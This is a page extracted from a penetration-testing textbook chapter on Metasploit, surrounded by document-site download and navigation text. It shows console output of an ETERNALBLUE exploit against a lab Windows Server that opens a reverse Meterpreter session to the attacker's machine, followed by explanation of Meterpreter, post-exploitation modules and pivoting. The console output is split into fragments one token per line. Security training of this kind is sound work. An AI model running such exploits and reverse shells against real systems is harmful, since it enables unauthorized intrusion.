for exploitation. [ + ] 192.168.86.48:445 - Connection established for

Download 22,59 Mb. Pdf ko'rish
bet	169/225
Sana	14.05.2024
Hajmi	22,59 Mb.
	#232856

1 ... 165 166 167 168 169 170 171 172 ... 225

Bog'liq
learningkalilinux

184 | Chapter 6: Owning Metasploit
Using Meterpreter

for
exploitation.
[
+
]
192.168.86.48:445 - Connection established
for
exploitation.
[
+
]
192.168.86.48:445 - Target OS selected valid
for
OS indicated by SMB reply
[
*
]
192.168.86.48:445 - CORE raw buffer dump
(
51
bytes
)
[
*
]
192.168.86.48:445 - 0x00000000
57
69
6e
64
6f
77
73
20
53
65
72
76
65
72
20
32
Windows Server 2
[
*
]
192.168.86.48:445 - 0x00000010
30
30
38
20
52
32
20
53
74
61
6e
64
61
72
64
20
008
R2 Standard
[
*
]
192.168.86.48:445 - 0x00000020
37
36
30
31
20
53
65
72
76
69
63
65
20
50
61
63
7601
Service Pac
[
*
]
192.168.86.48:445 - 0x00000030 6b
20
31
k 1
[
+
]
192.168.86.48:445 - Target arch selected valid
for
arch indicated by DCE/RPC reply
[
*
]
192.168.86.48:445 - Trying exploit with
12
Groom Allocations.
[
*
]
192.168.86.48:445 - Sending all but last fragment of exploit packet
[
*
]
192.168.86.48:445 - Starting non-paged pool grooming
[
+
]
192.168.86.48:445 - Sending SMBv2 buffers
[
+
]
192.168.86.48:445 - Closing SMBv1 connection creating free hole adjacent to
SMBv2 buffer.
[
*
]
192.168.86.48:445 - Sending final SMBv2 buffers.
[
*
]
192.168.86.48:445 - Sending last fragment of exploit packet!
[
*
]
192.168.86.48:445 - Receiving response from exploit packet
[
+
]
192.168.86.48:445 - ETERNALBLUE overwrite completed successfully
(
0xC000000D
)
!
[
*
]
192.168.86.48:445 - Sending egg to corrupted connection.
[
*
]
192.168.86.48:445 - Triggering free of corrupted buffer.
[
*
]
Sending stage
(
205891
bytes
)
to 192.168.86.48
[
*
]
Meterpreter session
2
opened
(
192.168.86.21:4444 -> 192.168.86.48:49290
)
at
2018-01-29 18:16:59 -0700
[
+
]
192.168.86.48:445 -
=
-
=
-
=
-
=
-
=
-
=
-
=
-
=
-
=
-
=
-
=
-
=
-
=
-
=
-
=
-
=
-
=
-
=
-
=
-
=
-
=
-
=
-
=
-
=
-
=
-
=
-
=
-
=
-
=
-
=
-
=
[
+
]
192.168.86.48:445 -
=
-
=
-
=
-
=
-
=
-
=
-
=
-
=
-
=
-
=
-
=
-
=
-
=
-WIN-
=
-
=
-
=
-
=
-
=
-
=
-
=
-
=
-
=
-
=
-
=
-
=
-
=
-
=
-
=
-
=
[
+
]
192.168.86.48:445 -
=
-
=
-
=
-
=
-
=
-
=
-
=
-
=
-
=
-
=
-
=
-
=
-
=
-
=
-
=
-
=
-
=
-
=
-
=
-
=
-
=
-
=
-
=
-
=
-
=
-
=
-
=
-
=
-
=
-
=
-
=
184 | Chapter 6: Owning Metasploit

meterpreter >
You’ll see that the exploit runs exactly the same as it did before. The only difference
between these two exploit runs is the payload, which doesn’t impact the exploit at all.
It only presents us with a different interface to the system. Meterpreter is a great
interface that will give you quick and easy access to functions you wouldn’t get from
just the command interpreter.
Using Meterpreter
Once we have our Meterpreter shell, we can start using it to gather information. We
can download files. We can upload files. We can get file and process listings. I’ve men‐
tioned before that Meterpreter is operating system agnostic. This means that the same
set of commands will work no matter what operating system has been compromised.
It also means that when you are looking at processes or file listings, you don’t need to
know the specifics about the operating system or the operating system commands.
Instead, you just need to know the Meterpreter commands.
Keep in mind that not all exploits will use the Meterpreter payload.
More than that, not all exploits will be capable of using a Meterpr‐
eter payload. Everything in this section is relevant only when you
are able to use a Meterpreter-based payload.
While exploiting and gaining access to systems is definitely a start, it’s not the end
goal, or at least it isn’t commonly the end goal. After all, when you are performing
security testing, you may be asked to see how far you can go, just as an attacker
would. Meterpreter provides easy access to functions that will allow us to get deeper
into the network by using a technique called
pivoting
. Pivoting can be accomplished
with a post-exploitation module. Post-exploitation modules can also be used to
gather a lot of details about the system and users.
One thing to note about the post-exploitation modules is that they are operating sys‐
tem specific. This is different from the Meterpreter commands themselves. Instead,
the post-exploitation modules are Ruby scripts, just as the exploit and auxiliary
scripts are. They get loaded and executed through the connection between your Kali
system and the target system. A Windows system has gather, manage, and capture
modules. Linux and macOS have only gather modules.

Download 22,59 Mb.

1 ... 165 166 167 168 169 170 171 172 ... 225

Download 22,59 Mb.

Pdf ko'rish